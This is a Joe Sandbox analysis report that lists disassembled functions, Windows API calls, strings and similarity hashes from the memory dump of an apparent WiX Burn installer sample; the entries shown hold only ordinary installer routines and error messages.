strutil.cpp, xrefs: 0059249E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: strutil.cpp
API String ID: 3662877508-3612885251
Opcode ID: 6ff720eab7e9ae6e52c59931a7f8bf5b3ff072a781374b5790b330841f532c71
Instruction ID: 432a0a0f060b452413acafc78adfbc59bbf440d1ddbff2469097c09915d5f579
Opcode Fuzzy Hash: 6ff720eab7e9ae6e52c59931a7f8bf5b3ff072a781374b5790b330841f532c71
Instruction Fuzzy Hash: 2831E53020021AFFEF109E658CC4E663B9DBB54764F21462AFE199F2A0E771DC019760

Function 005C922B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,ECE85006,005C2444,00000000,00000000,005C3479,?,y4\,?,00000001,005C2444,ECE85006,00000001,005C3479,005C3479), ref: 005C9278
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005C9301
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 005C9313
__freea.LIBCMT ref: 005C931C

Part of subcall function 005C521A: HeapAlloc.KERNEL32(00000000,?,?,?,005C1F87,?,0000015D,?,?,?,?,005C33E0,000000FF,00000000,?,?), ref: 005C524C

Strings

y4\, xrefs: 005C923E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__freea
String ID: y4\
API String ID: 573072132-2107008229
Opcode ID: 03aee5113c2196979de2950aacf8dcbac39a8f5de4027e942060df92b47fe4a1
Instruction ID: 646f62f3d820dbbddb045012ad3aab872ed037b022e5b89198901da45333b6ed
Opcode Fuzzy Hash: 03aee5113c2196979de2950aacf8dcbac39a8f5de4027e942060df92b47fe4a1
Instruction Fuzzy Hash: B8318972A0020AAFDB259FA4CC89EAE7BA5FB40710B05052DF804D62A5E735DD95DB90

Function 005BAD44 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 107COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 005BADB3

Strings

Failed to extract all payloads from container: %ls, xrefs: 005BADF7
Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 005BAE4A
Failed to extract payload: %ls from container: %ls, xrefs: 005BAE3E
Failed to open container: %ls., xrefs: 005BAD85

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CompareString
String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
API String ID: 1825529933-3891707333
Opcode ID: 247b3b94823bca3670c971c6d07f90e43a92aca74917caa408d8d57d997c9431
Instruction ID: 14c932be7bc088177cdc506cc9acfe52b7cf0d18f8faf5c1796484759d826ad8
Opcode Fuzzy Hash: 247b3b94823bca3670c971c6d07f90e43a92aca74917caa408d8d57d997c9431
Instruction Fuzzy Hash: DD31C532D00216AFCF21AAE4CC4AEDE7F6DBF44710F104612F911A7191E731EA15DBA1

Function 005D7A10 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

SysFreeString.OLEAUT32(00000000), ref: 005D7AF4
SysFreeString.OLEAUT32(?), ref: 005D7AFF
SysFreeString.OLEAUT32(00000000), ref: 005D7B0A

Strings

atomutil.cpp, xrefs: 005D7A3D
`Dv, xrefs: 005D7AE9

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: FreeString$Heap$AllocateProcess
String ID: `Dv$atomutil.cpp
API String ID: 2724874077-1153537316
Opcode ID: c7ec96d2e72bc8e0b3a33a61da7868ca644c6346429bba61ee830e406025f007
Instruction ID: 6043c309e0f877b8121271953d60a6d3e0ad0fc94bf0bb6bc579e040b2f104f7
Opcode Fuzzy Hash: c7ec96d2e72bc8e0b3a33a61da7868ca644c6346429bba61ee830e406025f007
Instruction Fuzzy Hash: 08315232D0552DBBDB229A98CC45E9EBFA9FF48750F1141A7E900AB350F7759F009B90

Function 0059F005 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 96registryCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,005A0654,00000001,00000001,00000001,005A0654,00000000), ref: 0059F07D
RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,005A0654,00000001,00000001,00000001,005A0654,00000000,00000001,00000000,?,005A0654,00000001), ref: 0059F09A

Strings

Failed to remove update registration key: %ls, xrefs: 0059F0C7
Failed to format key for update registration., xrefs: 0059F033
PackageVersion, xrefs: 0059F05E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseCompareString
String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
API String ID: 446873843-3222553582
Opcode ID: bbcab6523d9ced0802213d63470c1e34ee151b6ee975e831926219c76c619c39
Instruction ID: 7d1bdc8593d34a5b92d99c1d77873a84b389d47ef9c6f6b36ece3eb15264d775
Opcode Fuzzy Hash: bbcab6523d9ced0802213d63470c1e34ee151b6ee975e831926219c76c619c39
Instruction Fuzzy Hash: 0C218435D01225BADF31ABA9CC0DFAEBEBCFF40720F100266B915E2291E7318A40D790

Function 005D433D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D4440: FindFirstFileW.KERNEL32(005B923A,?,00000100,00000000,00000000), ref: 005D447B
Part of subcall function 005D4440: FindClose.KERNEL32(00000000), ref: 005D4487

RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 005D4430

Part of subcall function 005D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,005FAAA0,00000000,?,005D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 005D0F80

Part of subcall function 005D1217: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 005D123F
Part of subcall function 005D1217: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,005A70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 005D1276

Strings

SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 005D436F
PendingFileRenameOperations, xrefs: 005D439B
crypt32.dll, xrefs: 005D4368
\, xrefs: 005D43B9

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseFindQueryValue$FileFirstOpen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
API String ID: 3397690329-3978359083
Opcode ID: 6ecc97fba8e5fae9f8ce3960556218d20e279cff96c5d3acab8761f3dae2f4fa
Instruction ID: f4e28649182072fa34a9d84232f8efc58a0feb4bb12e40adc8a4938982992e71
Opcode Fuzzy Hash: 6ecc97fba8e5fae9f8ce3960556218d20e279cff96c5d3acab8761f3dae2f4fa
Instruction Fuzzy Hash: B3316931A01209ABDF30AF99C885AAEBFB5FB10750F54816BE904A6251E7319EC0DF50

Function 005D4019 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(00000000,00594DBC,00000000,?,?,00000000,?,005D412D,00000000,00594DBC,00000000,00000000,?,005A85EE,?,?), ref: 005D4033
GetLastError.KERNEL32(?,005D412D,00000000,00594DBC,00000000,00000000,?,005A85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 005D4041
CopyFileW.KERNEL32(00000000,00594DBC,00000000,00594DBC,00000000,?,005D412D,00000000,00594DBC,00000000,00000000,?,005A85EE,?,?,00000001), ref: 005D40AC
GetLastError.KERNEL32(?,005D412D,00000000,00594DBC,00000000,00000000,?,005A85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 005D40B6

Strings

fileutil.cpp, xrefs: 005D40D5

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CopyErrorFileLast
String ID: fileutil.cpp
API String ID: 374144340-2967768451
Opcode ID: c4ef92067e759e9e417810c16cb729e44609527017c9e9923386a764c9c2695c
Instruction ID: 06e33b5d1587ea77019e42dae6b9df1f8e0e43fe892476e303b465e3175a577e
Opcode Fuzzy Hash: c4ef92067e759e9e417810c16cb729e44609527017c9e9923386a764c9c2695c
Instruction Fuzzy Hash: E021AF2660127697AB300AAE4C4CB3B6E98FF14BA0B154537EF04DF351E7B18D409BE1

Function 0059EF1B Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0059EF56

Part of subcall function 005D4153: SetFileAttributesW.KERNEL32(005B923A,00000080,00000000,005B923A,000000FF,00000000,?,?,005B923A), ref: 005D4182
Part of subcall function 005D4153: GetLastError.KERNEL32(?,?,005B923A), ref: 005D418C

Part of subcall function 00593C6B: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,0059EFA1,00000001,00000000,00000095,00000001,005A0663,00000095,00000000,swidtag,00000001), ref: 00593C88

Strings

Failed to allocate regid file path., xrefs: 0059EFB5
Failed to allocate regid folder path., xrefs: 0059EFBC
swidtag, xrefs: 0059EF65
Failed to format tag folder path., xrefs: 0059EFC3

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AttributesDirectoryErrorFileLastOpen@16Remove
String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
API String ID: 1428973842-4170906717
Opcode ID: e7d82b2b3b371d679ce1b7e6f6ec67091640313bc8cb9dd9bb0bfc2e98c93e19
Instruction ID: 13f2c7976159a12d2c6d2094d00d4e06e94a89e4fc7009dd1e96998fca164edb
Opcode Fuzzy Hash: e7d82b2b3b371d679ce1b7e6f6ec67091640313bc8cb9dd9bb0bfc2e98c93e19
Instruction Fuzzy Hash: 97216731900629BBDF25EB99C846A9DBFB5BF84310F1480A7E518A62A1D7319A41EB90

Function 005B8DB6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,005FAAA0,00000000,?,005D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 005D0F80

CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 005B8E3A
RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,0059F7E0,00000001,00000100,000001B4,00000000), ref: 005B8E88

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 005B8DD7
Failed to open uninstall registry key., xrefs: 005B8DFD
Failed to enumerate uninstall key for related bundles., xrefs: 005B8E99

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseCompareOpenString
String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 2817536665-2531018330
Opcode ID: d95fc191545ec2be4496afc7f71c2dc65722324c1cb0b59dd1f75c7f474929d8
Instruction ID: afe4a7d95bc3fd6397a65f5741c0c4e21decf2fff7878b1c35eb4b4d068800da
Opcode Fuzzy Hash: d95fc191545ec2be4496afc7f71c2dc65722324c1cb0b59dd1f75c7f474929d8
Instruction Fuzzy Hash: 3021A636900229FFDF21AA94CC4ABFEBF6DFB00720F245666F51066190DB759E90E690

Function 005BD259 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

WaitForSingleObject.KERNEL32(?,000000FF), ref: 005BD2EE
ReleaseMutex.KERNEL32(?), ref: 005BD31C
SetEvent.KERNEL32(?), ref: 005BD325

Strings

Failed to allocate buffer., xrefs: 005BD29D
NetFxChainer.cpp, xrefs: 005BD293

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate buffer.$NetFxChainer.cpp
API String ID: 944053411-3611226795
Opcode ID: 7c192d50bb1ec9a3d84868f49414f68583ab2c96f7415539fb1267dd7d3b31aa
Instruction ID: 7f0db56cf1559987589c5272ee9cf6d0c91bedd9fed17a4b1da85ead0dbd2ff4
Opcode Fuzzy Hash: 7c192d50bb1ec9a3d84868f49414f68583ab2c96f7415539fb1267dd7d3b31aa
Instruction Fuzzy Hash: B321B77560030AFFDB109F68D844A99FBF5FF48320F148629F964A7352D775A950CB50

Function 005D5907 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,005B6B11,00000000,?), ref: 005D591D
GetLastError.KERNEL32(?,?,005B6B11,00000000,?,?,?,?,?,?,?,?,?,005B6F28,?,?), ref: 005D592B

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,005B6B11,00000000,?), ref: 005D5965
GetLastError.KERNEL32(?,?,005B6B11,00000000,?,?,?,?,?,?,?,?,?,005B6F28,?,?), ref: 005D596F

Strings

svcutil.cpp, xrefs: 005D594E, 005D5990

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ConfigErrorHeapLastQueryService$AllocateProcess
String ID: svcutil.cpp
API String ID: 355237494-1746323212
Opcode ID: c987fd43d7147a3d961b6ed50cd629858f83a57a294bffbd807fab52b939d65e
Instruction ID: cdb45009e61e4161aa746d37346fbefa57c219b425d8ba09101e8ea0a8603aed
Opcode Fuzzy Hash: c987fd43d7147a3d961b6ed50cd629858f83a57a294bffbd807fab52b939d65e
Instruction Fuzzy Hash: 1F21D436942635E7E7315B998D18BAF6E69BB40BB1F124017FD44EB300F6308E00E2E1

Function 005D3245 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 005D3258
VariantInit.OLEAUT32(?), ref: 005D3264
VariantClear.OLEAUT32(?), ref: 005D32D8
SysFreeString.OLEAUT32(00000000), ref: 005D32E3

Part of subcall function 005D3498: SysAllocString.OLEAUT32(?), ref: 005D34AD

Strings

`Dv, xrefs: 005D32E3

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: String$AllocVariant$ClearFreeInit
String ID: `Dv
API String ID: 347726874-3059127152
Opcode ID: b1caacd9a710e4cf83ba10d6bedc2df032bcadb070d734a3ad7147c965430925
Instruction ID: fe7068be47cca7c7ca74bff493b35ea767203e912d55b3787084f33db8b3e4b0
Opcode Fuzzy Hash: b1caacd9a710e4cf83ba10d6bedc2df032bcadb070d734a3ad7147c965430925
Instruction Fuzzy Hash: 32213D35D01219EFCB24DBA8C858EAEBBB9FF48716F11455BE80197320D7319E09DB91

Function 00599839 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 005998C8

Strings

Failed to find variable., xrefs: 005998B5
condition.cpp, xrefs: 0059986A, 005998AB
Failed to read next symbol., xrefs: 005998E4
Failed to parse condition '%ls' at position: %u, xrefs: 0059987A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: _memcpy_s
String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
API String ID: 2001391462-1605196437
Opcode ID: c82f3f9ad0232e2315e4d99274f6b3a08e9556c3228ca0854b4b91e53c1aee56
Instruction ID: f732390737c1fac16e500ed7de411a51ca69890257ebc29277f41d9466a0c3d9
Opcode Fuzzy Hash: c82f3f9ad0232e2315e4d99274f6b3a08e9556c3228ca0854b4b91e53c1aee56
Instruction Fuzzy Hash: 9311E732181225B6EF353D6CDC8ED963E29FF56720F04445FF9006A292C662C911D7E1

Function 00599E16 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00599E38

Strings

Failed to set variable., xrefs: 00599E97
Failed get file version., xrefs: 00599E78
File search: %ls, did not find path: %ls, xrefs: 00599EA3
Failed to format path string., xrefs: 00599E43

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Open@16
String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
API String ID: 3613110473-2458530209
Opcode ID: 15d74a70062a58a16e1979efca2a3da72c72823bc194bb1a32da8c7b63022af8
Instruction ID: b0c0844f19a62d58ea5b695cf9fd6a9bb20ffed4fe102389aab58c2cc5d4d033
Opcode Fuzzy Hash: 15d74a70062a58a16e1979efca2a3da72c72823bc194bb1a32da8c7b63022af8
Instruction Fuzzy Hash: AC119D76D4012ABBDF22AE9CCC868AEBF7DFF54750F10416BF9106A210D7319E10AB91

Function 005A820F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,005A8E17,0000001A,00000000,?,00000000,00000000), ref: 005A8258
GetLastError.KERNEL32(?,?,005A8E17,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 005A8262

Strings

Failed to allocate memory for well known SID., xrefs: 005A8240
Failed to create well known SID., xrefs: 005A8290
cache.cpp, xrefs: 005A8236, 005A8286

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Heap$AllocateCreateErrorKnownLastProcessWell
String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
API String ID: 2186923214-2110050797
Opcode ID: 0b4466fa16ab3d6860af6e1a443c802a0588d6d65f1c55494161de6fb7b38ada
Instruction ID: 1858db95cf42b1bb13a1512c378822e365787405cf262491632b64a4284f7d72
Opcode Fuzzy Hash: 0b4466fa16ab3d6860af6e1a443c802a0588d6d65f1c55494161de6fb7b38ada
Instruction Fuzzy Hash: 7801C636552626EBDB3166999C0EFBF6F59FF82BB0B11401BFD00AB280EE708D0041E0

Function 005BDDA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 005BDDCE
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 005BDDF8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,005BDFC8,00000000,?,?,?,?,00000000), ref: 005BDE00

Strings

Failed while waiting for download., xrefs: 005BDE2E
bitsuser.cpp, xrefs: 005BDE24

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
